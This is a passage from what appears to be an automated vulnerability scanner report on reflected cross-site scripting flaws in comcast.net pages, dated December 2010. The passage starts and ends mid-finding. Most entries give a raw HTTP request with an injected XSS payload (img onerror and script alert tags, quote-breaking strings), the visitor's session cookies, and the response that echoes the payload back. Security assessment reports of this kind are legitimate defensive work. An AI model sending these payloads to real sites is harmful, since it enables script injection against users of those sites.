User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'mlb72ecb<img src=a onerror=alert(1)>ee671481b9b'</h2>
...[SNIP]...

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8d'%3ba545177219c was submitted in the REST URL parameter 2. This input was echoed as d5f8d';a545177219c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlbd5f8d'%3ba545177219c/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/mlbd5f8d';a545177219c/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31d78"%3bf24acd488c8 was submitted in the REST URL parameter 2. This input was echoed as 31d78";f24acd488c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlb31d78"%3bf24acd488c8/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:41 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/mlb31d78";f24acd488c8/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9d89<img%20src%3da%20onerror%3dalert(1)>a003304798 was submitted in the REST URL parameter 2. This input was echoed as b9d89<img src=a onerror=alert(1)>a003304798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-nflb9d89<img%20src%3da%20onerror%3dalert(1)>a003304798/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'nflb9d89<img src=a onerror=alert(1)>a003304798'</h2>
...[SNIP]...

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c4d"%3b7eb771f3fbf was submitted in the REST URL parameter 2. This input was echoed as 30c4d";7eb771f3fbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl30c4d"%3b7eb771f3fbf/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/nfl30c4d";7eb771f3fbf/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b123'%3bc5f8a8bc2aa was submitted in the REST URL parameter 2. This input was echoed as 4b123';c5f8a8bc2aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl4b123'%3bc5f8a8bc2aa/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/nfl4b123';c5f8a8bc2aa/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a was submitted in the REST URL parameter 2. This input was echoed as d868f--><img src=a onerror=alert(1)>5e235b0f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /entertainment/reelnewsd868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:01 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: reelnewsd868f--><img src=a onerror=alert(1)>5e235b0f13a -->
...[SNIP]...

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 was submitted in the REST URL parameter 2. This input was echoed as a6cf7<img src=a onerror=alert(1)>e7ac8a1e642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsa6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:54 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'reelnewsa6cf7<img src=a onerror=alert(1)>e7ac8a1e642'</h2>
...[SNIP]...

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8d2"><script>alert(1)</script>befae20f7ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae/" type="application/rss+xml" title="Comcast.net - Entertainment" id="rss" />
...[SNIP]...

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea was submitted in the REST URL parameter 2. This input was echoed as c6f94--><img src=a onerror=alert(1)>39e088bf6ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /finance/forwhatitsworthc6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:11 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: forwhatitsworthc6f94--><img src=a onerror=alert(1)>39e088bf6ea -->
...[SNIP]...

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20 was submitted in the REST URL parameter 2. This input was echoed as 3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /finance/forwhatitsworth3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:07 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='finance' subchannel'forwhatitsworth3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20'</h2>
...[SNIP]...

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /finance/taxcenter/

Issue detail

